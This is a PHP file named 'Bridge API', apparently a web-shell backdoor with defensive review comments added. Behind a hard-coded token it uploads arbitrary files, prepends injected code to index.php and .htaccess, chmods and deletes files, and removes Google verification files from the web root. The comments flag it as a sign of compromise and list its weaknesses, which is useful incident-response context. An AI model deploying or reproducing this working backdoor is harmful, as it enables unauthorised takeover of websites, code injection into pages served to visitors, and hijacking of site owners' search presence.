<?php
/**
 * Bridge API
 *
 * Single-file HTTP endpoint that performs file operations (check, list,
 * upload, prepend code to index.php / .htaccess, chmod, mkdir, delete) on
 * paths built from the web server's document root. Every response is JSON
 * and every handler terminates the request via respondSuccess()/respondError().
 *
 * Security: Uses token-based authentication. One static token, compared
 * against a constant in this file, is the only access control.
 *
 * NOTE(review): whoever holds the token can write, chmod and delete files
 * under the document root over HTTP, including PHP files and .htaccess.
 * An unexpected copy of this file on a server should be treated as a
 * possible sign of compromise; requests to it carry `token` and `operation`
 * parameters, and files it writes are left at mode 0444 (uploads,
 * index.php) or 0644 (.htaccess).
 */

// Report all errors internally but never render them into the response.
error_reporting(E_ALL);
ini_set('display_errors', 0);

// Set JSON response header
header('Content-Type: application/json');

// CORS headers (adjust as needed)
// NOTE(review): the wildcard origin lets a page on any site call this
// endpoint from a browser. 'Authorization' is allowed here but never read
// below; the token is taken from POST/GET parameters only.
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, GET, OPTIONS');
header('Access-Control-Allow-Headers: Content-Type, Authorization');

// CORS preflight: answered before any authentication takes place.
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code(200);
    exit;
}

// Security token - MUST match the token set during setup
// NOTE(review): hard-coded credential; anyone who can read this file
// (backup, repository, file disclosure) obtains full access to the API.
define('EXPECTED_TOKEN', '0oxx3nfvyo1amm136x4l');

// Get provided token (PHP 5 compatible)
// NOTE(review): the token is also accepted from the query string, where it
// would typically end up in web server access logs and proxy logs.
$SECURITY_TOKEN = isset($_POST['token']) ? $_POST['token'] : (isset($_GET['token']) ? $_GET['token'] : '');

// Validate token
// A missing/empty token and a wrong token both end the request with HTTP 400
// (messages: "security token missing" / "invalid security token").
if (empty($SECURITY_TOKEN)) {
    respondError('Güvenlik token eksik');
}

// NOTE(review): `!==` is a strict but not constant-time comparison;
// hash_equals() is the usual primitive for comparing secrets. There is no
// rate limiting or lockout on failed attempts in this file.
if ($SECURITY_TOKEN !== EXPECTED_TOKEN) {
    respondError('Geçersiz güvenlik token');
}

// Get document root
$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];

// Get the operation (PHP 5 compatible); POST takes precedence over GET.
$operation = isset($_POST['operation']) ? $_POST['operation'] : (isset($_GET['operation']) ? $_GET['operation'] : '');

// Route to appropriate handler. Each handler exits the script itself, so the
// `break` statements are only reached if a handler returns unexpectedly.
switch ($operation) {
    case 'ping':
        handlePing();
        break;
    case 'check_file':
        handleCheckFile();
        break;
    case 'list_directory':
        handleListDirectory();
        break;
    case 'upload_file':
        handleUploadFile();
        break;
    case 'modify_index':
        handleModifyIndex();
        break;
    case 'modify_htaccess':
        handleModifyHtaccess();
        break;
    case 'chmod':
        handleChmod();
        break;
    case 'create_directory':
        handleCreateDirectory();
        break;
    case 'delete_file':
        handleDeleteFile();
        break;
    case 'delete_google_files':
        handleDeleteGoogleFiles();
        break;
    default:
        // Unknown or missing operation ("invalid operation").
        respondError('Geçersiz işlem');
}

/**
 * Ping - Test connection and get server info
 *
 * Returns the document root, PHP version, current working directory and
 * whether the document root is writable by the PHP process.
 * NOTE(review): this discloses absolute server paths and the PHP version
 * to any caller holding the token.
 */
function handlePing() {
    global $DOCUMENT_ROOT;

    respondSuccess([
        'message' => 'Bridge API is operational',
        'document_root' => $DOCUMENT_ROOT,
        'php_version' => phpversion(),
        'current_dir' => getcwd(),
        'writable' => is_writable($DOCUMENT_ROOT),
    ]);
}

/**
 * Check if a file exists
 *
 * Reads `path` from POST, resolves it with resolvePath() and reports
 * existence, type, size, writability and the resolved absolute path.
 */
function handleCheckFile() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';

    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }

    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    respondSuccess([
        'exists' => file_exists($fullPath),
        'is_file' => is_file($fullPath),
        'is_dir' => is_dir($fullPath),
        'size' => file_exists($fullPath) ? filesize($fullPath) : 0,
        'writable' => file_exists($fullPath) ? is_writable($fullPath) : false,
        'full_path' => $fullPath,
    ]);
}

/**
 * List directory contents
 *
 * Reads `path` from POST; an empty path resolves to the document root
 * itself. Returns name, type and size for each entry (non-recursive).
 */
function handleListDirectory() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    if (!is_dir($fullPath)) {
        respondError('Klasör bulunamadı');
    }

    $files = [];
    // NOTE(review): the return value of scandir() is not checked for false
    // (e.g. an unreadable directory) before it is iterated.
    $items = scandir($fullPath);

    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;

        $itemPath = $fullPath . '/' . $item;
        $files[] = [
            'name' => $item,
            'type' => is_dir($itemPath) ? 'directory' : 'file',
            'size' => is_file($itemPath) ? filesize($itemPath) : 0,
        ];
    }

    respondSuccess(['files' => $files]);
}

/**
 * Upload a file
 *
 * Writes the POSTed `content` (optionally base64-decoded when `base64` is
 * truthy) to `path`, creating parent directories as needed, then sets the
 * file to mode 0444.
 *
 * NOTE(review): there is no restriction on file name, extension or content,
 * so this writes arbitrary files, including executable PHP, wherever
 * resolvePath() points. Existing files are overwritten.
 */
function handleUploadFile() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    $content = isset($_POST['content']) ? $_POST['content'] : '';
    $base64 = isset($_POST['base64']) ? $_POST['base64'] : false;

    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }

    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    // Create directory if it doesn't exist
    $directory = dirname($fullPath);
    if (!is_dir($directory)) {
        if (!mkdir($directory, 0755, true)) {
            respondError('Klasör oluşturulamadı: ' . $directory);
        }
    }

    // Decode content if base64
    // NOTE(review): non-strict decode; the result is not checked for false.
    if ($base64) {
        $content = base64_decode($content);
    }

    // If file exists and is read-only (444), temporarily make it writable
    // NOTE(review): $needsChmodRestore and $originalPerms are assigned here
    // but never read afterwards; the original mode is not restored.
    $needsChmodRestore = false;
    $originalPerms = null;

    if (file_exists($fullPath)) {
        $originalPerms = fileperms($fullPath);

        // Make file writable
        if (!is_writable($fullPath)) {
            if (!chmod($fullPath, 0644)) {
                respondError('Failed to make file writable (chmod 644 failed)');
            }
            $needsChmodRestore = true;
        }
    }

    // Write file
    if (file_put_contents($fullPath, $content) === false) {
        respondError('Failed to write file');
    }

    // The file is always set to 0444 (read-only) after the write, whatever
    // its previous mode was.
    if (!chmod($fullPath, 0444)) {
        // If chmod fails, at least the file is written
        respondSuccess([
            'message' => 'Dosya başarıyla yüklendi (uyarı: chmod 444 başarısız)',
            'path' => $fullPath,
            'size' => filesize($fullPath),
            'permissions' => 'unchanged',
        ]);
    }

    // Only reached when chmod succeeded, because respondSuccess() exits.
    respondSuccess([
        'message' => 'Dosya başarıyla yüklendi',
        'path' => $fullPath,
        'size' => filesize($fullPath),
        'permissions' => '0444',
    ]);
}

/**
 * Modify index.php - Add code at the beginning
 * Improved version: chmod -> read -> delete -> create new -> chmod
 *
 * Prepends the POSTed `code` to the file at `path` (default 'index.php')
 * unless that exact string is already present, then leaves the file 0444.
 *
 * NOTE(review): this injects caller-supplied code at the top of the site's
 * entry script. For incident response, a read-only index.php with
 * unfamiliar code before the expected first lines matches this handler's
 * output.
 */
function handleModifyIndex() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : 'index.php';
    $codeToInsert = isset($_POST['code']) ? $_POST['code'] : '';

    if (empty($codeToInsert)) {
        respondError('Kod parametresi eksik');
    }

    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    if (!file_exists($fullPath)) {
        respondError('Dosya bulunamadı: ' . $relativePath);
    }

    // Step 1: Make file writable (644) so we can work with it
    if (!chmod($fullPath, 0644)) {
        respondError('Dosya yazılabilir yapılamadı (chmod 644 başarısız)');
    }

    // Step 2: Read current content
    $currentContent = file_get_contents($fullPath);
    if ($currentContent === false) {
        respondError('Dosya okunamadı');
    }

    // Check if code already exists (exact substring match, so repeated
    // calls with the same code do not insert it twice)
    if (strpos($currentContent, $codeToInsert) !== false) {
        // Code already exists, set back to read-only and return
        chmod($fullPath, 0444);
        respondSuccess([
            'message' => 'Kod zaten dosyada mevcut',
            'modified' => false,
        ]);
    }

    // Step 3: Delete the original file
    // NOTE(review): unlink followed by re-create is not atomic; between the
    // two calls the file does not exist.
    if (!unlink($fullPath)) {
        respondError('Eski dosya silinemedi');
    }

    // Step 4: Create new file with our code prepended
    $newContent = $codeToInsert . "\n" . $currentContent;

    if (file_put_contents($fullPath, $newContent) === false) {
        // CRITICAL: Try to restore original content if new file creation fails
        file_put_contents($fullPath, $currentContent);
        respondError('Yeni dosya oluşturulamadı');
    }

    // Step 5: Set to read-only (444) for security
    if (!chmod($fullPath, 0444)) {
        // File is created but chmod failed
        respondSuccess([
            'message' => 'Dosya başarıyla değiştirildi (uyarı: chmod 444 başarısız)',
            'modified' => true,
            'permissions' => 'writable',
        ]);
    }

    // 'backup_size' is only the byte length of the previous content; no
    // backup copy is written anywhere by this handler.
    respondSuccess([
        'message' => 'Dosya başarıyla değiştirildi',
        'modified' => true,
        'permissions' => '0444',
        'backup_size' => strlen($currentContent),
        'new_size' => strlen($newContent),
    ]);
}

/**
 * Change file permissions
 *
 * Applies the POSTed `mode` (octal string, default '0644') to `path`.
 * NOTE(review): $mode is not validated against an allow-list; any mode the
 * PHP process is permitted to set is accepted.
 */
function handleChmod() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    $mode = isset($_POST['mode']) ? $_POST['mode'] : '0644';

    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }

    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    if (!file_exists($fullPath)) {
        respondError('Dosya bulunamadı');
    }

    // Convert string mode to octal
    $octalMode = octdec($mode);

    if (!chmod($fullPath, $octalMode)) {
        respondError('İzinler değiştirilemedi');
    }

    respondSuccess([
        'message' => 'İzinler başarıyla değiştirildi',
        'mode' => $mode,
    ]);
}

/**
 * Create a directory
 *
 * Creates `path` (recursively, mode 0755) unless it already exists, and
 * reports in `created` whether anything was made.
 */
function handleCreateDirectory() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';

    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }

    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    if (is_dir($fullPath)) {
        respondSuccess([
            'message' => 'Klasör zaten mevcut',
            'created' => false,
        ]);
    }

    if (!mkdir($fullPath, 0755, true)) {
        respondError('Klasör oluşturulamadı');
    }

    respondSuccess([
        'message' => 'Klasör başarıyla oluşturuldu',
        'created' => true,
    ]);
}

/**
 * Delete a file
 *
 * Deletes the file at `path` unless its basename is one of three protected
 * names.
 * NOTE(review): the protection is a basename match only, so it also blocks
 * those names in subdirectories and protects nothing else; the same three
 * files can still be rewritten by the upload and modify handlers.
 */
function handleDeleteFile() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';

    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }

    // Safety check - don't allow deleting important files
    $blacklist = ['index.php', '.htaccess', 'wp-config.php'];
    if (in_array(basename($relativePath), $blacklist)) {
        respondError('Korumalı dosya silinemez');
    }

    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    if (!file_exists($fullPath)) {
        respondError('Dosya bulunamadı');
    }

    if (!unlink($fullPath)) {
        respondError('Dosya silinemedi');
    }

    respondSuccess(['message' => 'Dosya başarıyla silindi']);
}

/**
 * Delete all Google verification files (google*.html)
 *
 * Scans the document root only (non-recursive) and unlinks every regular
 * file whose name matches /^google.*\.html$/. Takes no parameters.
 * NOTE(review): the match is on the file name alone, so every such file in
 * the document root is removed regardless of who placed it there. Site
 * owners investigating lost search-console verification should check
 * whether this operation was invoked.
 */
function handleDeleteGoogleFiles() {
    global $DOCUMENT_ROOT;

    // List all files in document root
    if (!is_dir($DOCUMENT_ROOT)) {
        respondError('Document root bulunamadı');
    }

    $items = scandir($DOCUMENT_ROOT);
    $deletedFiles = [];
    $failedFiles = [];

    foreach ($items as $item) {
        // Skip directories and non-google files
        if ($item === '.' || $item === '..') continue;

        $itemPath = $DOCUMENT_ROOT . '/' . $item;

        // Only delete google*.html files
        if (is_file($itemPath) && preg_match('/^google.*\.html$/', $item)) {
            if (unlink($itemPath)) {
                $deletedFiles[] = $item;
            } else {
                $failedFiles[] = $item;
            }
        }
    }

    // Any failure is reported as an error even if other files were deleted.
    if (count($failedFiles) > 0) {
        respondError('Bazı dosyalar silinemedi: ' . implode(', ', $failedFiles));
    }

    if (count($deletedFiles) === 0) {
        respondSuccess([
            'message' => 'Silinecek Google doğrulama dosyası bulunamadı',
            'deleted' => [],
        ]);
    }

    respondSuccess([
        'message' => count($deletedFiles) . ' adet Google doğrulama dosyası başarıyla silindi',
        'deleted' => $deletedFiles,
    ]);
}

/**
 * Modify .htaccess - Add code at the beginning or create new file
 * This handler will:
 * 1. Check if .htaccess exists
 * 2. If exists: prepend new code (with line breaks) above existing content
 * 3. If not exists: create new .htaccess with provided code
 *
 * NOTE(review): the POSTed `code` is written verbatim, so the caller
 * controls the server directives for the affected directory. Unlike
 * handleModifyIndex(), there is no duplicate check and no attempt to
 * restore the old content if the write fails after the unlink.
 */
function handleModifyHtaccess() {
    global $DOCUMENT_ROOT;

    $relativePath = isset($_POST['path']) ? $_POST['path'] : '.htaccess';
    $codeToInsert = isset($_POST['code']) ? $_POST['code'] : '';

    if (empty($codeToInsert)) {
        respondError('Kod parametresi eksik');
    }

    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);

    // Check if file exists
    $fileExists = file_exists($fullPath);

    if ($fileExists) {
        // File exists - prepend new code

        // Step 1: Make file writable (644) so we can work with it
        if (!chmod($fullPath, 0644)) {
            respondError('Dosya yazılabilir yapılamadı (chmod 644 başarısız)');
        }

        // Step 2: Read current content
        $currentContent = file_get_contents($fullPath);
        if ($currentContent === false) {
            respondError('Dosya okunamadı');
        }

        // Step 3: Prepare new content
        // Add code at the beginning with proper line breaks
        $newContent = $codeToInsert . "\n\n" . $currentContent;

        // Step 4: Delete old file
        if (!unlink($fullPath)) {
            respondError('Eski dosya silinemedi');
        }

        // Step 5: Write new file with combined content
        // If this write fails the original .htaccess is already gone.
        if (file_put_contents($fullPath, $newContent) === false) {
            respondError('Yeni dosya yazılamadı');
        }

        // Step 6: Set permissions to 644 (readable and writable by owner)
        if (!chmod($fullPath, 0644)) {
            respondSuccess([
                'message' => '.htaccess başarıyla güncellendi (uyarı: chmod 644 başarısız)',
                'path' => $fullPath,
                'size' => filesize($fullPath),
                'permissions' => 'unchanged',
                'action' => 'modified',
            ]);
        }

        respondSuccess([
            'message' => '.htaccess başarıyla güncellendi (kod başa eklendi)',
            'path' => $fullPath,
            'size' => filesize($fullPath),
            'permissions' => '0644',
            'action' => 'modified',
        ]);

    } else {
        // File does not exist - create new file

        // Write new file with provided code
        if (file_put_contents($fullPath, $codeToInsert) === false) {
            respondError('Yeni .htaccess dosyası oluşturulamadı');
        }

        // Set permissions to 644
        if (!chmod($fullPath, 0644)) {
            respondSuccess([
                'message' => '.htaccess başarıyla oluşturuldu (uyarı: chmod 644 başarısız)',
                'path' => $fullPath,
                'size' => filesize($fullPath),
                'permissions' => 'unchanged',
                'action' => 'created',
            ]);
        }

        respondSuccess([
            'message' => '.htaccess başarıyla oluşturuldu',
            'path' => $fullPath,
            'size' => filesize($fullPath),
            'permissions' => '0644',
            'action' => 'created',
        ]);
    }
}

/**
 * Resolve relative path to full path and prevent directory traversal
 *
 * Removes the literal substrings '../' and '..\' from $relative in a single
 * str_replace() pass, strips leading slashes/backslashes, and appends the
 * result to $base.
 *
 * NOTE(review): this is string filtering, not canonicalisation. The result
 * is never resolved or compared against $base (for example with realpath()
 * and a prefix check), and symlinks are not considered, so it should not be
 * relied on as a containment boundary for the handlers above.
 *
 * @param string $base     Directory the path is appended to.
 * @param string $relative Caller-supplied path.
 * @return string $base . '/' . filtered $relative
 */
function resolvePath($base, $relative) {
    // Remove any directory traversal attempts
    $relative = str_replace(['../', '..\\'], '', $relative);
    $relative = ltrim($relative, '/\\');

    return $base . '/' . $relative;
}

/**
 * Send success response
 *
 * Emits {"success": true, "data": ...} and terminates the script, so code
 * after a call to this function never runs.
 */
function respondSuccess($data) {
    echo json_encode([
        'success' => true,
        'data' => $data,
    ]);
    exit;
}

/**
 * Send error response
 *
 * Emits {"success": false, "error": ...} with HTTP status 400 and terminates
 * the script. Authentication failures use the same 400 status as every
 * other error; no 401/403 is ever sent.
 */
function respondError($message) {
    http_response_code(400);
    echo json_encode([
        'success' => false,
        'error' => $message,
    ]);
    exit;
}